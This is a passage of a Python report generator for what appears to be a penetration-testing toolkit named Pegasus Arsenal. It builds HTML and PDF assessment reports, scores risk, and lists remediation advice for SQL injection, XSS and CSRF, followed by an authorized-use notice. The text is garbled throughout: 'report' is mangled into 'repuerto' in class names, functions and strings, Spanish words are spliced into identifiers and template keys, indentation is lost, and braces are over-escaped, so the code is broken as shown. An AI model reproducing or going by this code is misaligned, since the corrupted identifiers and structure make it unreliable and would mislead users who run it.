.low-risk \\\\{ border-left: 5px solid #388e3c; \\\\}
.recommendation \\\\{ background: #f5f5f5; padding: 15px; margin: 10px 0; \\\\}
</style>
</head>
<body>
<div class="header">
<h1>Security Assessment Repuerto</h1>
<h2>Generated by Pegasus Arsenal</h2>
</div>
<div class="section">
<h2>Executive Summary</h2>
\\\\{\\\\{ executive_summary \\\\}\\\\}
</div>
<div class="section">
<h2>Technical Details</h2>
\\\\{\\\\{ technical_details \\\\}\\\\}
</div>
<div class="section">
<h2>Recommendations</h2>
\\\\{\\\\{ recommendations \\\\}\\\\}
</div>
</body>
</html>
"""
template = Template(full_repuerto_template)
html_repuerto = template.render(**repuerto_sections)
if output_format.lower() == 'html':
return html_repuerto
elif output_format.lower() == 'pdf':
return pdfkit.from_string(html_repuerto, False)
else:
raise ValueError("Unsuppuertoed output format")
def calculate_risk_score(self, high, medium, low):
"""Calculate overall risk score"""
score = (high * 10) + (medium * 5) + (low * 1)
if score >= 50:
return "Critical"
elif score >= 25:
return "High"
elif score >= 10:
return "Medium"
else:
return "Low"
def generate_vuln_recommendations(self):
"""Generate vulnerabilidad-specific recommendations"""
recommendations = []
vuln_types = set(v.get('type', 'Unknown') for v in self.repuerto_data.get('vulnerabilities', []))
recommendation_map = \\\\{
'inyección SQL': \\\\{
'title': 'inyección SQL Prevention',
'Descripción': 'Implement parámetroized queries and input validation',
'priority': 'High',
'effort': 'Medium'
\\\\},
'cross-site scripting (XSS)': \\\\{
'title': 'XSS Prevention',
'Descripción': 'Implement output encoding and Content Security Policy',
'priority': 'High',
'effort': 'Medium'
\\\\},
'Cross-Site Request Forgery': \\\\{
'title': 'CSRF Protection',
'Descripción': 'Implement CSRF tokens and SameSite cookies',
'priority': 'Medium',
'effort': 'Low'
\\\\}
\\\\}
for vuln_type in vuln_types:
if vuln_type in recommendation_map:
recommendations.append(recommendation_map[vuln_type])
return recommendations
def get_executive_template(self):
return """
<h3>Assessment Overview</h3>
<p>This security assessment was conducted on <strong>\\\\{\\\\{ objetivo \\\\}\\\\}</strong> on \\\\{\\\\{ scan_date \\\\}\\\\}.</p>
<h4>clave Findings</h4>
<ul>
<li>Total Vulnerabilities Found: \\\\{\\\\{ total_vulnerabilities \\\\}\\\\}</li>
<li>High Risk: \\\\{\\\\{ high_risk_count \\\\}\\\\}</li>
<li>Medium Risk: \\\\{\\\\{ medium_risk_count \\\\}\\\\}</li>
<li>Low Risk: \\\\{\\\\{ low_risk_count \\\\}\\\\}</li>
<li>Overall Risk Score: \\\\{\\\\{ risk_score \\\\}\\\\}</li>
</ul>
"""
def get_technical_template(self):
return """
<h3>vulnerabilidad Details</h3>
\\\\{% for vuln in vulnerabilities %\\\\}
<div class="vulnerabilidad \\\\{\\\\{ vuln.severity|lower \\\\}\\\\}-risk">
<h4>\\\\{\\\\{ vuln.name \\\\}\\\\}</h4>
<p><strong>Severity:</strong> \\\\{\\\\{ vuln.severity \\\\}\\\\}</p>
<p><strong>Descripción:</strong> \\\\{\\\\{ vuln.Descripción \\\\}\\\\}</p>
<p><strong>Location:</strong> \\\\{\\\\{ vuln.url \\\\}\\\\}</p>
\\\\{% if vuln.proof_of_concept %\\\\}
<p><strong>Proof of Concept:</strong></p>
<pre>\\\\{\\\\{ vuln.proof_of_concept \\\\}\\\\}</pre>
\\\\{% endif %\\\\}
</div>
\\\\{% endfor %\\\\}
"""
def get_recommendations_template(self):
return """
<h3>Security Recommendations</h3>
\\\\{% for rec in recommendations %\\\\}
<div class="recommendation">
<h4>\\\\{\\\\{ rec.title \\\\}\\\\}</h4>
<p>\\\\{\\\\{ rec.Descripción \\\\}\\\\}</p>
<p><strong>Priority:</strong> \\\\{\\\\{ rec.priority \\\\}\\\\}</p>
<p><strong>Implementation Effort:</strong> \\\\{\\\\{ rec.effort \\\\}\\\\}</p>
</div>
\\\\{% endfor %\\\\}
"""
# uso ejemplo
if __name__ == "__main__":
generator = PegasusRepuertoGenerator()
generator.load_scan_results('scan_results.json')
# Generate HTML repuerto
html_repuerto = generator.generate_full_repuerto('html')
with open('security_assessment_repuerto.html', 'w') as f:
f.write(html_repuerto)
# Generate PDF repuerto
pdf_repuerto = generator.generate_full_repuerto('pdf')
with open('security_assessment_repuerto.pdf', 'wb') as f:
f.write(pdf_repuerto)
⚠️ Security Notice: Pegasus-Pentest-Arsenal is a comprehensive pruebas de penetración toolkit that should only be used for authorized security testing activities. Always ensure you have explicit written permission before testing any systems or applications. The toolkit contains powerful exploitation capabilities that could cause system damage or data loss if misused. Use this tool responsibly and in accordance with applicable laws, regulations, and ethical guidelines. Always operate within the scope of authorized pruebas de penetración engagements and follow responsible disclosure practices for any vulnerabilities discovered.
📚 Additional Resources: - Pegasus Arsenal GitHub Repository - OWASP Testing Guide - NIST Cybersecurity Framework - PTES Technical Guidelines